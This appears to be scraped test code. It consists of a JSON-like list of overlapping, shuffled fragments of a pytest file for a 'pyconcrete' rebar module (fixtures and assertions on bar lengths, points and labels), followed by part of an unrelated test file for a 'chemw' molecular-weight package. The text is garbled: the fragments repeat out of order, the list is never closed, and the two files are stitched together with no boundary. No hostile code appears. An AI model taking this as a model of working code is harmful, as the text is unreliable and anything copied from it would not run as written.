[ "lr1.diameter == 20 def test_count_l(lr1): assert lr1.count == 2 def test_insert_l(lr1): assert lr1.insert", "assert ur1.text_len == 'L=200' r_scale = copy.deepcopy(r1) r_scale.scale(75, 20) assert r_scale.text_len == 'L=5'", "def test_points(r1): pts = [(0, 0), (5, 0)] assert r1.points() == pts def", "10 assert lr1.x2 == 15 assert lr1.y == 20 # def test_real_length(r1, lr1,", "r = rebar.URebar( length=200, diameter=16, count=4, insert=(0, 0), v_align='bot') return r def test_length(r1):", "rebar @pytest.fixture def r1(): r = rebar.Rebar( length=5, diameter=20, count=1, insert=(0, 0)) return", "0), (5, 0)] assert r1.points() == pts def test_length_L(lr1): assert lr1.length == 5", "ur1.y == 0 assert lr1.x1 == 10 assert lr1.x2 == 15 assert lr1.y", "assert r1.text == '1~20' assert lr1.text == '2~20' assert ur1.text == '4~16' def", "from pyconcrete import rebar @pytest.fixture def r1(): r = rebar.Rebar( length=5, diameter=20, count=1,", "assert lr1.length == 5 def test_diameter_l(lr1): assert lr1.diameter == 20 def test_count_l(lr1): assert", "== 15 assert lr1.y == 20 # def test_real_length(r1, lr1, ur1): # assert", "copy.deepcopy(r1) r_scale.scale(75, 20) assert r_scale.text_len == 'L=5' def test_xy_level(r1, lr1, ur1): assert r1.x1", "test_length(r1): assert r1.length == 5 def test_diameter(r1): assert r1.diameter == 20 def test_count(r1):", "ur1): assert r1.x1 == 0 assert r1.x2 == 5 assert r1.y == 0", "test_diameter_l(lr1): assert lr1.diameter == 20 def test_count_l(lr1): assert lr1.count == 2 def test_insert_l(lr1):", "20), (13.75, 20)] assert ur1.points_along() == [(50, 0), (100, 0), (150, 0)] def", "test_real_length(r1, lr1, ur1): # assert r1.real_length == 5 # assert lr1.real_length == 200", "r1.length == 5 def test_diameter(r1): assert r1.diameter == 20 def test_count(r1): assert r1.count", "lr1, ur1): assert r1.points_along() == [(1.25, 0), (2.5, 0), (3.75, 0)] assert lr1.points_along()", "assert ur1.x2 == 200 assert ur1.y == 0 assert lr1.x1 == 10 assert", 
"[(50, 0), (100, 0), (150, 0)] def test_text(r1, lr1, ur1): assert r1.text ==", "== 0 assert r1.x2 == 5 assert r1.y == 0 assert ur1.x1 ==", "r = rebar.LRebar( length=5, diameter=20, count=2, insert=(10, 20), v_align='top', h_align='left') return r @pytest.fixture", "(10, 20), (15, 20)] assert lr1.points() == pts def test_points_u(ur1): pts = [(0,", "r1.x2 == 5 assert r1.y == 0 assert ur1.x1 == 0 assert ur1.x2", "v_align='bot') return r def test_length(r1): assert r1.length == 5 def test_diameter(r1): assert r1.diameter", "'L=5' def test_xy_level(r1, lr1, ur1): assert r1.x1 == 0 assert r1.x2 == 5", "r_scale.text_len == 'L=5' def test_xy_level(r1, lr1, ur1): assert r1.x1 == 0 assert r1.x2", "import pytest import copy from pyconcrete import rebar @pytest.fixture def r1(): r =", "r1.points_along() == [(1.25, 0), (2.5, 0), (3.75, 0)] assert lr1.points_along() == [(11.25, 20),", "0), (3.75, 0)] assert lr1.points_along() == [(11.25, 20), (12.5, 20), (13.75, 20)] assert", "ur1.points_along() == [(50, 0), (100, 0), (150, 0)] def test_text(r1, lr1, ur1): assert", "ur1): assert r1.text_len == 'L=5' assert ur1.text_len == 'L=200' r_scale = copy.deepcopy(r1) r_scale.scale(75,", "= [(0, 6), (0, 0), (200, 0), (200, 6)] assert ur1.points() == pts", "== 20 def test_count_l(lr1): assert lr1.count == 2 def test_insert_l(lr1): assert lr1.insert ==", "(13.75, 20)] assert ur1.points_along() == [(50, 0), (100, 0), (150, 0)] def test_text(r1,", "lr1.text == '2~20' assert ur1.text == '4~16' def test_text_len(r1, ur1): assert r1.text_len ==", "lr1, ur1): assert r1.text == '1~20' assert lr1.text == '2~20' assert ur1.text ==", "lr1, ur1): # assert r1.real_length == 5 # assert lr1.real_length == 200 #", "20 def test_count_l(lr1): assert lr1.count == 2 def test_insert_l(lr1): assert lr1.insert == (10,", "0), (200, 0), (200, 6)] assert ur1.points() == pts def test_points_along(r1, lr1, ur1):", "count=2, insert=(10, 20), v_align='top', h_align='left') return r @pytest.fixture def ur1(): r = 
rebar.URebar(", "2 def test_insert_l(lr1): assert lr1.insert == (10, 20) def test_points_l(lr1): pts = [(10,", "test_insert_l(lr1): assert lr1.insert == (10, 20) def test_points_l(lr1): pts = [(10, 14), (10,", "assert ur1.x1 == 0 assert ur1.x2 == 200 assert ur1.y == 0 assert", "return r @pytest.fixture def ur1(): r = rebar.URebar( length=200, diameter=16, count=4, insert=(0, 0),", "assert lr1.points_along() == [(11.25, 20), (12.5, 20), (13.75, 20)] assert ur1.points_along() == [(50,", "def lr1(): r = rebar.LRebar( length=5, diameter=20, count=2, insert=(10, 20), v_align='top', h_align='left') return", "== [(50, 0), (100, 0), (150, 0)] def test_text(r1, lr1, ur1): assert r1.text", "= [(10, 14), (10, 20), (15, 20)] assert lr1.points() == pts def test_points_u(ur1):", "import rebar @pytest.fixture def r1(): r = rebar.Rebar( length=5, diameter=20, count=1, insert=(0, 0))", "assert r1.points() == pts def test_length_L(lr1): assert lr1.length == 5 def test_diameter_l(lr1): assert", "20), (15, 20)] assert lr1.points() == pts def test_points_u(ur1): pts = [(0, 6),", "[(0, 6), (0, 0), (200, 0), (200, 6)] assert ur1.points() == pts def", "20)] assert ur1.points_along() == [(50, 0), (100, 0), (150, 0)] def test_text(r1, lr1,", "assert lr1.count == 2 def test_insert_l(lr1): assert lr1.insert == (10, 20) def test_points_l(lr1):", "test_count_l(lr1): assert lr1.count == 2 def test_insert_l(lr1): assert lr1.insert == (10, 20) def", "0)] assert r1.points() == pts def test_length_L(lr1): assert lr1.length == 5 def test_diameter_l(lr1):", "assert lr1.insert == (10, 20) def test_points_l(lr1): pts = [(10, 14), (10, 20),", "20) assert r_scale.text_len == 'L=5' def test_xy_level(r1, lr1, ur1): assert r1.x1 == 0", "def test_diameter(r1): assert r1.diameter == 20 def test_count(r1): assert r1.count == 1 def", "v_align='top', h_align='left') return r @pytest.fixture def ur1(): r = rebar.URebar( length=200, diameter=16, count=4,", "ur1): # assert r1.real_length == 5 # assert 
lr1.real_length == 200 # assert", "diameter=16, count=4, insert=(0, 0), v_align='bot') return r def test_length(r1): assert r1.length == 5", "0)] assert lr1.points_along() == [(11.25, 20), (12.5, 20), (13.75, 20)] assert ur1.points_along() ==", "lr1.insert == (10, 20) def test_points_l(lr1): pts = [(10, 14), (10, 20), (15,", "length=5, diameter=20, count=1, insert=(0, 0)) return r @pytest.fixture def lr1(): r = rebar.LRebar(", "assert lr1.diameter == 20 def test_count_l(lr1): assert lr1.count == 2 def test_insert_l(lr1): assert", "assert r1.text_len == 'L=5' assert ur1.text_len == 'L=200' r_scale = copy.deepcopy(r1) r_scale.scale(75, 20)", "def test_text_len(r1, ur1): assert r1.text_len == 'L=5' assert ur1.text_len == 'L=200' r_scale =", "@pytest.fixture def lr1(): r = rebar.LRebar( length=5, diameter=20, count=2, insert=(10, 20), v_align='top', h_align='left')", "r1.insert == (0, 0) def test_points(r1): pts = [(0, 0), (5, 0)] assert", "1 def test_insert(r1): assert r1.insert == (0, 0) def test_points(r1): pts = [(0,", "= rebar.LRebar( length=5, diameter=20, count=2, insert=(10, 20), v_align='top', h_align='left') return r @pytest.fixture def", "0 assert r1.x2 == 5 assert r1.y == 0 assert ur1.x1 == 0", "rebar.LRebar( length=5, diameter=20, count=2, insert=(10, 20), v_align='top', h_align='left') return r @pytest.fixture def ur1():", "0) def test_points(r1): pts = [(0, 0), (5, 0)] assert r1.points() == pts", "'4~16' def test_text_len(r1, ur1): assert r1.text_len == 'L=5' assert ur1.text_len == 'L=200' r_scale", "assert r1.insert == (0, 0) def test_points(r1): pts = [(0, 0), (5, 0)]", "def test_xy_level(r1, lr1, ur1): assert r1.x1 == 0 assert r1.x2 == 5 assert", "== 'L=5' def test_xy_level(r1, lr1, ur1): assert r1.x1 == 0 assert r1.x2 ==", "# assert r1.real_length == 5 # assert lr1.real_length == 200 # assert ur1.real_length", "20) def test_points_l(lr1): pts = [(10, 14), (10, 20), (15, 20)] assert lr1.points()", "assert r1.real_length == 5 # assert lr1.real_length 
== 200 # assert ur1.real_length ==", "return r @pytest.fixture def lr1(): r = rebar.LRebar( length=5, diameter=20, count=2, insert=(10, 20),", "assert lr1.x1 == 10 assert lr1.x2 == 15 assert lr1.y == 20 #", "(12.5, 20), (13.75, 20)] assert ur1.points_along() == [(50, 0), (100, 0), (150, 0)]", "0 assert lr1.x1 == 10 assert lr1.x2 == 15 assert lr1.y == 20", "== (0, 0) def test_points(r1): pts = [(0, 0), (5, 0)] assert r1.points()", "test_count(r1): assert r1.count == 1 def test_insert(r1): assert r1.insert == (0, 0) def", "def r1(): r = rebar.Rebar( length=5, diameter=20, count=1, insert=(0, 0)) return r @pytest.fixture", "lr1.points_along() == [(11.25, 20), (12.5, 20), (13.75, 20)] assert ur1.points_along() == [(50, 0),", "length=5, diameter=20, count=2, insert=(10, 20), v_align='top', h_align='left') return r @pytest.fixture def ur1(): r", "ur1.points() == pts def test_points_along(r1, lr1, ur1): assert r1.points_along() == [(1.25, 0), (2.5,", "assert lr1.points() == pts def test_points_u(ur1): pts = [(0, 6), (0, 0), (200,", "def test_points_along(r1, lr1, ur1): assert r1.points_along() == [(1.25, 0), (2.5, 0), (3.75, 0)]", "0), (150, 0)] def test_text(r1, lr1, ur1): assert r1.text == '1~20' assert lr1.text", "== 10 assert lr1.x2 == 15 assert lr1.y == 20 # def test_real_length(r1,", "# def test_real_length(r1, lr1, ur1): # assert r1.real_length == 5 # assert lr1.real_length", "r1.count == 1 def test_insert(r1): assert r1.insert == (0, 0) def test_points(r1): pts", "diameter=20, count=1, insert=(0, 0)) return r @pytest.fixture def lr1(): r = rebar.LRebar( length=5,", "def test_length(r1): assert r1.length == 5 def test_diameter(r1): assert r1.diameter == 20 def", "rebar.Rebar( length=5, diameter=20, count=1, insert=(0, 0)) return r @pytest.fixture def lr1(): r =", "== 0 assert ur1.x2 == 200 assert ur1.y == 0 assert lr1.x1 ==", "0 assert ur1.x1 == 0 assert ur1.x2 == 200 assert ur1.y == 0", "r1.points() == pts def test_length_L(lr1): assert lr1.length == 5 def 
test_diameter_l(lr1): assert lr1.diameter", "== pts def test_length_L(lr1): assert lr1.length == 5 def test_diameter_l(lr1): assert lr1.diameter ==", "5 assert r1.y == 0 assert ur1.x1 == 0 assert ur1.x2 == 200", "r1.real_length == 5 # assert lr1.real_length == 200 # assert ur1.real_length == 250", "def test_points_u(ur1): pts = [(0, 6), (0, 0), (200, 0), (200, 6)] assert", "ur1.text == '4~16' def test_text_len(r1, ur1): assert r1.text_len == 'L=5' assert ur1.text_len ==", "r1(): r = rebar.Rebar( length=5, diameter=20, count=1, insert=(0, 0)) return r @pytest.fixture def", "0), (2.5, 0), (3.75, 0)] assert lr1.points_along() == [(11.25, 20), (12.5, 20), (13.75,", "assert r1.diameter == 20 def test_count(r1): assert r1.count == 1 def test_insert(r1): assert", "def test_real_length(r1, lr1, ur1): # assert r1.real_length == 5 # assert lr1.real_length ==", "== 5 def test_diameter_l(lr1): assert lr1.diameter == 20 def test_count_l(lr1): assert lr1.count ==", "ur1.x1 == 0 assert ur1.x2 == 200 assert ur1.y == 0 assert lr1.x1", "== [(1.25, 0), (2.5, 0), (3.75, 0)] assert lr1.points_along() == [(11.25, 20), (12.5,", "assert ur1.text == '4~16' def test_text_len(r1, ur1): assert r1.text_len == 'L=5' assert ur1.text_len", "== (10, 20) def test_points_l(lr1): pts = [(10, 14), (10, 20), (15, 20)]", "assert r_scale.text_len == 'L=5' def test_xy_level(r1, lr1, ur1): assert r1.x1 == 0 assert", "(200, 6)] assert ur1.points() == pts def test_points_along(r1, lr1, ur1): assert r1.points_along() ==", "== 200 assert ur1.y == 0 assert lr1.x1 == 10 assert lr1.x2 ==", "ur1): assert r1.points_along() == [(1.25, 0), (2.5, 0), (3.75, 0)] assert lr1.points_along() ==", "lr1.y == 20 # def test_real_length(r1, lr1, ur1): # assert r1.real_length == 5", "20)] assert lr1.points() == pts def test_points_u(ur1): pts = [(0, 6), (0, 0),", "pts = [(10, 14), (10, 20), (15, 20)] assert lr1.points() == pts def", "test_insert(r1): assert r1.insert == (0, 0) def test_points(r1): pts = [(0, 0), (5,", "r = 
rebar.Rebar( length=5, diameter=20, count=1, insert=(0, 0)) return r @pytest.fixture def lr1():", "200 assert ur1.y == 0 assert lr1.x1 == 10 assert lr1.x2 == 15", "length=200, diameter=16, count=4, insert=(0, 0), v_align='bot') return r def test_length(r1): assert r1.length ==", "ur1.text_len == 'L=200' r_scale = copy.deepcopy(r1) r_scale.scale(75, 20) assert r_scale.text_len == 'L=5' def", "<gh_stars>10-100 import pytest import copy from pyconcrete import rebar @pytest.fixture def r1(): r", "0), (100, 0), (150, 0)] def test_text(r1, lr1, ur1): assert r1.text == '1~20'", "0)] def test_text(r1, lr1, ur1): assert r1.text == '1~20' assert lr1.text == '2~20'", "== 0 assert lr1.x1 == 10 assert lr1.x2 == 15 assert lr1.y ==", "count=1, insert=(0, 0)) return r @pytest.fixture def lr1(): r = rebar.LRebar( length=5, diameter=20,", "def test_diameter_l(lr1): assert lr1.diameter == 20 def test_count_l(lr1): assert lr1.count == 2 def", "lr1.x1 == 10 assert lr1.x2 == 15 assert lr1.y == 20 # def", "= [(0, 0), (5, 0)] assert r1.points() == pts def test_length_L(lr1): assert lr1.length", "pts = [(0, 0), (5, 0)] assert r1.points() == pts def test_length_L(lr1): assert", "def ur1(): r = rebar.URebar( length=200, diameter=16, count=4, insert=(0, 0), v_align='bot') return r", "6)] assert ur1.points() == pts def test_points_along(r1, lr1, ur1): assert r1.points_along() == [(1.25,", "test_points_along(r1, lr1, ur1): assert r1.points_along() == [(1.25, 0), (2.5, 0), (3.75, 0)] assert", "[(1.25, 0), (2.5, 0), (3.75, 0)] assert lr1.points_along() == [(11.25, 20), (12.5, 20),", "pts = [(0, 6), (0, 0), (200, 0), (200, 6)] assert ur1.points() ==", "assert ur1.y == 0 assert lr1.x1 == 10 assert lr1.x2 == 15 assert", "assert lr1.x2 == 15 assert lr1.y == 20 # def test_real_length(r1, lr1, ur1):", "r1.diameter == 20 def test_count(r1): assert r1.count == 1 def test_insert(r1): assert r1.insert", "r @pytest.fixture def ur1(): r = rebar.URebar( length=200, diameter=16, count=4, insert=(0, 0), 
v_align='bot')", "== 1 def test_insert(r1): assert r1.insert == (0, 0) def test_points(r1): pts =", "(0, 0) def test_points(r1): pts = [(0, 0), (5, 0)] assert r1.points() ==", "r1.text_len == 'L=5' assert ur1.text_len == 'L=200' r_scale = copy.deepcopy(r1) r_scale.scale(75, 20) assert", "(150, 0)] def test_text(r1, lr1, ur1): assert r1.text == '1~20' assert lr1.text ==", "== 2 def test_insert_l(lr1): assert lr1.insert == (10, 20) def test_points_l(lr1): pts =", "pts def test_length_L(lr1): assert lr1.length == 5 def test_diameter_l(lr1): assert lr1.diameter == 20", "== 5 assert r1.y == 0 assert ur1.x1 == 0 assert ur1.x2 ==", "lr1.points() == pts def test_points_u(ur1): pts = [(0, 6), (0, 0), (200, 0),", "= rebar.URebar( length=200, diameter=16, count=4, insert=(0, 0), v_align='bot') return r def test_length(r1): assert", "insert=(10, 20), v_align='top', h_align='left') return r @pytest.fixture def ur1(): r = rebar.URebar( length=200,", "6), (0, 0), (200, 0), (200, 6)] assert ur1.points() == pts def test_points_along(r1,", "def test_insert_l(lr1): assert lr1.insert == (10, 20) def test_points_l(lr1): pts = [(10, 14),", "(0, 0), (200, 0), (200, 6)] assert ur1.points() == pts def test_points_along(r1, lr1,", "test_text_len(r1, ur1): assert r1.text_len == 'L=5' assert ur1.text_len == 'L=200' r_scale = copy.deepcopy(r1)", "test_xy_level(r1, lr1, ur1): assert r1.x1 == 0 assert r1.x2 == 5 assert r1.y", "r1.text == '1~20' assert lr1.text == '2~20' assert ur1.text == '4~16' def test_text_len(r1,", "return r def test_length(r1): assert r1.length == 5 def test_diameter(r1): assert r1.diameter ==", "14), (10, 20), (15, 20)] assert lr1.points() == pts def test_points_u(ur1): pts =", "(3.75, 0)] assert lr1.points_along() == [(11.25, 20), (12.5, 20), (13.75, 20)] assert ur1.points_along()", "test_points_u(ur1): pts = [(0, 6), (0, 0), (200, 0), (200, 6)] assert ur1.points()", "assert lr1.text == '2~20' assert ur1.text == '4~16' def test_text_len(r1, ur1): assert r1.text_len", "def 
test_length_L(lr1): assert lr1.length == 5 def test_diameter_l(lr1): assert lr1.diameter == 20 def", "(10, 20) def test_points_l(lr1): pts = [(10, 14), (10, 20), (15, 20)] assert", "(200, 0), (200, 6)] assert ur1.points() == pts def test_points_along(r1, lr1, ur1): assert", "test_text(r1, lr1, ur1): assert r1.text == '1~20' assert lr1.text == '2~20' assert ur1.text", "assert r1.points_along() == [(1.25, 0), (2.5, 0), (3.75, 0)] assert lr1.points_along() == [(11.25,", "= rebar.Rebar( length=5, diameter=20, count=1, insert=(0, 0)) return r @pytest.fixture def lr1(): r", "0), (200, 6)] assert ur1.points() == pts def test_points_along(r1, lr1, ur1): assert r1.points_along()", "r_scale.scale(75, 20) assert r_scale.text_len == 'L=5' def test_xy_level(r1, lr1, ur1): assert r1.x1 ==", "== [(11.25, 20), (12.5, 20), (13.75, 20)] assert ur1.points_along() == [(50, 0), (100,", "(15, 20)] assert lr1.points() == pts def test_points_u(ur1): pts = [(0, 6), (0,", "def test_count(r1): assert r1.count == 1 def test_insert(r1): assert r1.insert == (0, 0)", "[(10, 14), (10, 20), (15, 20)] assert lr1.points() == pts def test_points_u(ur1): pts", "(100, 0), (150, 0)] def test_text(r1, lr1, ur1): assert r1.text == '1~20' assert", "15 assert lr1.y == 20 # def test_real_length(r1, lr1, ur1): # assert r1.real_length", "20), (12.5, 20), (13.75, 20)] assert ur1.points_along() == [(50, 0), (100, 0), (150,", "assert ur1.points() == pts def test_points_along(r1, lr1, ur1): assert r1.points_along() == [(1.25, 0),", "r def test_length(r1): assert r1.length == 5 def test_diameter(r1): assert r1.diameter == 20", "ur1.x2 == 200 assert ur1.y == 0 assert lr1.x1 == 10 assert lr1.x2", "== pts def test_points_u(ur1): pts = [(0, 6), (0, 0), (200, 0), (200,", "def test_count_l(lr1): assert lr1.count == 2 def test_insert_l(lr1): assert lr1.insert == (10, 20)", "20 # def test_real_length(r1, lr1, ur1): # assert r1.real_length == 5 # assert", "== 5 def test_diameter(r1): assert r1.diameter == 20 def 
test_count(r1): assert r1.count ==", "r1.x1 == 0 assert r1.x2 == 5 assert r1.y == 0 assert ur1.x1", "h_align='left') return r @pytest.fixture def ur1(): r = rebar.URebar( length=200, diameter=16, count=4, insert=(0,", "5 def test_diameter(r1): assert r1.diameter == 20 def test_count(r1): assert r1.count == 1", "insert=(0, 0)) return r @pytest.fixture def lr1(): r = rebar.LRebar( length=5, diameter=20, count=2,", "[(11.25, 20), (12.5, 20), (13.75, 20)] assert ur1.points_along() == [(50, 0), (100, 0),", "assert r1.x2 == 5 assert r1.y == 0 assert ur1.x1 == 0 assert", "r @pytest.fixture def lr1(): r = rebar.LRebar( length=5, diameter=20, count=2, insert=(10, 20), v_align='top',", "r1.y == 0 assert ur1.x1 == 0 assert ur1.x2 == 200 assert ur1.y", "assert r1.x1 == 0 assert r1.x2 == 5 assert r1.y == 0 assert", "test_points(r1): pts = [(0, 0), (5, 0)] assert r1.points() == pts def test_length_L(lr1):", "test_diameter(r1): assert r1.diameter == 20 def test_count(r1): assert r1.count == 1 def test_insert(r1):", "'2~20' assert ur1.text == '4~16' def test_text_len(r1, ur1): assert r1.text_len == 'L=5' assert", "assert ur1.points_along() == [(50, 0), (100, 0), (150, 0)] def test_text(r1, lr1, ur1):", "import copy from pyconcrete import rebar @pytest.fixture def r1(): r = rebar.Rebar( length=5,", "test_points_l(lr1): pts = [(10, 14), (10, 20), (15, 20)] assert lr1.points() == pts", "(2.5, 0), (3.75, 0)] assert lr1.points_along() == [(11.25, 20), (12.5, 20), (13.75, 20)]", "pts def test_points_u(ur1): pts = [(0, 6), (0, 0), (200, 0), (200, 6)]", "== 'L=5' assert ur1.text_len == 'L=200' r_scale = copy.deepcopy(r1) r_scale.scale(75, 20) assert r_scale.text_len", "'L=5' assert ur1.text_len == 'L=200' r_scale = copy.deepcopy(r1) r_scale.scale(75, 20) assert r_scale.text_len ==", "assert r1.length == 5 def test_diameter(r1): assert r1.diameter == 20 def test_count(r1): assert", "insert=(0, 0), v_align='bot') return r def test_length(r1): assert r1.length == 5 def test_diameter(r1):", 
"0 assert ur1.x2 == 200 assert ur1.y == 0 assert lr1.x1 == 10", "== 20 # def test_real_length(r1, lr1, ur1): # assert r1.real_length == 5 #", "== 20 def test_count(r1): assert r1.count == 1 def test_insert(r1): assert r1.insert ==", "assert r1.count == 1 def test_insert(r1): assert r1.insert == (0, 0) def test_points(r1):", "== '1~20' assert lr1.text == '2~20' assert ur1.text == '4~16' def test_text_len(r1, ur1):", "ur1): assert r1.text == '1~20' assert lr1.text == '2~20' assert ur1.text == '4~16'", "r_scale = copy.deepcopy(r1) r_scale.scale(75, 20) assert r_scale.text_len == 'L=5' def test_xy_level(r1, lr1, ur1):", "'1~20' assert lr1.text == '2~20' assert ur1.text == '4~16' def test_text_len(r1, ur1): assert", "lr1.count == 2 def test_insert_l(lr1): assert lr1.insert == (10, 20) def test_points_l(lr1): pts", "0)) return r @pytest.fixture def lr1(): r = rebar.LRebar( length=5, diameter=20, count=2, insert=(10,", "rebar.URebar( length=200, diameter=16, count=4, insert=(0, 0), v_align='bot') return r def test_length(r1): assert r1.length", "diameter=20, count=2, insert=(10, 20), v_align='top', h_align='left') return r @pytest.fixture def ur1(): r =", "count=4, insert=(0, 0), v_align='bot') return r def test_length(r1): assert r1.length == 5 def", "(5, 0)] assert r1.points() == pts def test_length_L(lr1): assert lr1.length == 5 def", "== '2~20' assert ur1.text == '4~16' def test_text_len(r1, ur1): assert r1.text_len == 'L=5'", "== 'L=200' r_scale = copy.deepcopy(r1) r_scale.scale(75, 20) assert r_scale.text_len == 'L=5' def test_xy_level(r1,", "lr1, ur1): assert r1.x1 == 0 assert r1.x2 == 5 assert r1.y ==", "def test_text(r1, lr1, ur1): assert r1.text == '1~20' assert lr1.text == '2~20' assert", "assert lr1.y == 20 # def test_real_length(r1, lr1, ur1): # assert r1.real_length ==", "copy from pyconcrete import rebar @pytest.fixture def r1(): r = rebar.Rebar( length=5, diameter=20,", "test_length_L(lr1): assert lr1.length == 5 def test_diameter_l(lr1): assert 
lr1.diameter == 20 def test_count_l(lr1):", "5 def test_diameter_l(lr1): assert lr1.diameter == 20 def test_count_l(lr1): assert lr1.count == 2", "pts def test_points_along(r1, lr1, ur1): assert r1.points_along() == [(1.25, 0), (2.5, 0), (3.75,", "def test_insert(r1): assert r1.insert == (0, 0) def test_points(r1): pts = [(0, 0),", "@pytest.fixture def ur1(): r = rebar.URebar( length=200, diameter=16, count=4, insert=(0, 0), v_align='bot') return", "20), v_align='top', h_align='left') return r @pytest.fixture def ur1(): r = rebar.URebar( length=200, diameter=16,", "== pts def test_points_along(r1, lr1, ur1): assert r1.points_along() == [(1.25, 0), (2.5, 0),", "pyconcrete import rebar @pytest.fixture def r1(): r = rebar.Rebar( length=5, diameter=20, count=1, insert=(0,", "0), v_align='bot') return r def test_length(r1): assert r1.length == 5 def test_diameter(r1): assert", "ur1(): r = rebar.URebar( length=200, diameter=16, count=4, insert=(0, 0), v_align='bot') return r def", "== '4~16' def test_text_len(r1, ur1): assert r1.text_len == 'L=5' assert ur1.text_len == 'L=200'", "lr1(): r = rebar.LRebar( length=5, diameter=20, count=2, insert=(10, 20), v_align='top', h_align='left') return r", "assert r1.y == 0 assert ur1.x1 == 0 assert ur1.x2 == 200 assert", "20 def test_count(r1): assert r1.count == 1 def test_insert(r1): assert r1.insert == (0,", "== 0 assert ur1.x1 == 0 assert ur1.x2 == 200 assert ur1.y ==", "lr1.x2 == 15 assert lr1.y == 20 # def test_real_length(r1, lr1, ur1): #", "'L=200' r_scale = copy.deepcopy(r1) r_scale.scale(75, 20) assert r_scale.text_len == 'L=5' def test_xy_level(r1, lr1,", "lr1.length == 5 def test_diameter_l(lr1): assert lr1.diameter == 20 def test_count_l(lr1): assert lr1.count", "@pytest.fixture def r1(): r = rebar.Rebar( length=5, diameter=20, count=1, insert=(0, 0)) return r", "[(0, 0), (5, 0)] assert r1.points() == pts def test_length_L(lr1): assert lr1.length ==", "def test_points_l(lr1): pts = [(10, 14), (10, 20), (15, 20)] assert 
lr1.points() ==", "pytest import copy from pyconcrete import rebar @pytest.fixture def r1(): r = rebar.Rebar(", "= copy.deepcopy(r1) r_scale.scale(75, 20) assert r_scale.text_len == 'L=5' def test_xy_level(r1, lr1, ur1): assert" ]
[ "162.7, 'Na2.43Cl(Ca(OH)2)1.2':180.2, 'Na2.43Cl:2H2O': 127.3, 'Na2.43Cl2.5:2H2O': 180.5, 'CaCl2:(MgCl2)2:12H2O': 517.6, 'Na2SO4:3K2SO4': 664.8, 'K2SO4:CaSO4:H2O': 328.4, 'Na.96Al.96Si2.04O6:H2O", "chem_mw.final, chem_mw.end, phreeq_db.verbose]: assert type(TF) is bool rmtree(phreeq_db.output_path) def test_accuracy(): # calculate the", "import the class modules chem_mw = chemw.ChemMW() phreeq_db = chemw.PHREEQdb() print(os.getcwd()) for TF", "phreeq_databases: print('\\n\\n\\n', re.search('([A-Za-z0-9_\\.]+(?=\\.dat))',db).group(), 'database\\n', '='*len(db)) phreeq_db.process(db) # verify the output folder and its", "os.path.exists(os.path.join(phreeq_db.output_path, json_name)) assert type(phreeq_db.db_name) is str assert type(phreeq_db.db) is DataFrame # delete the", "isclose(chem_mw.raw_mw, test_chemicals[chemical], rel_tol = tolerance): assert False else: assert True # affirm that", "modules chem_mw = chemw.ChemMW() phreeq_db = chemw.PHREEQdb() print(os.getcwd()) for TF in [chem_mw.verbose, chem_mw.final,", "180.5, 'CaCl2:(MgCl2)2:12H2O': 517.6, 'Na2SO4:3K2SO4': 664.8, 'K2SO4:CaSO4:H2O': 328.4, 'Na.96Al.96Si2.04O6:H2O ': 219.2, 'Ca1.019Na.136K.006Al2.18Si6.82O18:7.33H2O': 714.4 }", "of known MW test_chemicals = { 'Na2.43_Cl_(OH)2_(OH)1.2_(OH)': 162.7, 'Na2.43Cl(Ca(OH)2)1.2':180.2, 'Na2.43Cl:2H2O': 127.3, 'Na2.43Cl2.5:2H2O': 180.5,", "os def test_inits(): # import the class modules chem_mw = chemw.ChemMW() phreeq_db =", "in phreeq_databases: print('\\n\\n\\n', re.search('([A-Za-z0-9_\\.]+(?=\\.dat))',db).group(), 'database\\n', '='*len(db)) phreeq_db.process(db) # verify the output folder and", "test_accuracy(): # calculate the MW for chemicals of known MW test_chemicals = {", "= os.path.join(os.path.dirname(__file__), 'PHREEQqb') phreeq_db = chemw.PHREEQdb() for db in phreeq_databases: print('\\n\\n\\n', re.search('([A-Za-z0-9_\\.]+(?=\\.dat))',db).group(), 'database\\n',", "class modules chem_mw = chemw.ChemMW() phreeq_db = chemw.PHREEQdb() 
print(os.getcwd()) for TF in [chem_mw.verbose,", "import DataFrame from shutil import rmtree from math import isclose from glob import", "False else: assert True # affirm that iterated entities are zero for zero", "chemical in test_chemicals: chem_mw.mass(chemical) tolerance = chem_mw.mw*0.001 # 99.9% accuracy if not isclose(chem_mw.raw_mw,", "type(TF) is bool rmtree(phreeq_db.output_path) def test_accuracy(): # calculate the MW for chemicals of", "are zero for zero in [chem_mw.groups, chem_mw.layer, chem_mw.skip_characters]: assert zero == 0 def", "MW for chemicals of known MW test_chemicals = { 'Na2.43_Cl_(OH)2_(OH)1.2_(OH)': 162.7, 'Na2.43Cl(Ca(OH)2)1.2':180.2, 'Na2.43Cl:2H2O':", "from pandas import DataFrame from shutil import rmtree from math import isclose from", "math import isclose from glob import glob import chemw import re, os def", "the MW for chemicals of known MW test_chemicals = { 'Na2.43_Cl_(OH)2_(OH)1.2_(OH)': 162.7, 'Na2.43Cl(Ca(OH)2)1.2':180.2,", "json_name = re.search('([A-Za-z0-9_\\.]+(?=\\.dat))', db).group()+'.json' assert os.path.exists(os.path.join(phreeq_db.output_path, json_name)) assert type(phreeq_db.db_name) is str assert type(phreeq_db.db)", "entities are zero for zero in [chem_mw.groups, chem_mw.layer, chem_mw.skip_characters]: assert zero == 0", "assert os.path.exists(os.path.join(phreeq_db.output_path, json_name)) assert type(phreeq_db.db_name) is str assert type(phreeq_db.db) is DataFrame # delete", "'PHREEQqb') phreeq_db = chemw.PHREEQdb() for db in phreeq_databases: print('\\n\\n\\n', re.search('([A-Za-z0-9_\\.]+(?=\\.dat))',db).group(), 'database\\n', '='*len(db)) phreeq_db.process(db)", "import isclose from glob import glob import chemw import re, os def test_inits():", "== 0 def test_phreeq_db(): # process the PHREEQ databases phreeq_databases = [db for", "accuracy if not isclose(chem_mw.raw_mw, test_chemicals[chemical], rel_tol = tolerance): assert False else: assert True", "test_chemicals[chemical], rel_tol = tolerance): 
